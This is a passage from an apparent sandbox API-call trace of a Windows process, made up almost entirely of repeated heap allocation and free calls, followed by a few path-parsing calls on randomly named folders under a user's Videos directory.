(HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0197.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2dc80 [0197.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0197.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0197.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0197.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0197.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0197.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.360] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\C9Qz99w\\") returned="C9Qz99w\\" [0197.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0197.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2ed50 [0197.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.364] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\") returned="F72Mw_KNQRugYJJCcBc\\" [0197.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0197.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0197.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0197.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ed50 | out: hHeap=0x6a0000) returned 1 [0197.366] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\") returned="SVKL6Wu5uab uSVqvA\\" [0197.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0197.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0197.366] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\") returned="-DwrKzslsF2\\" [0197.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, 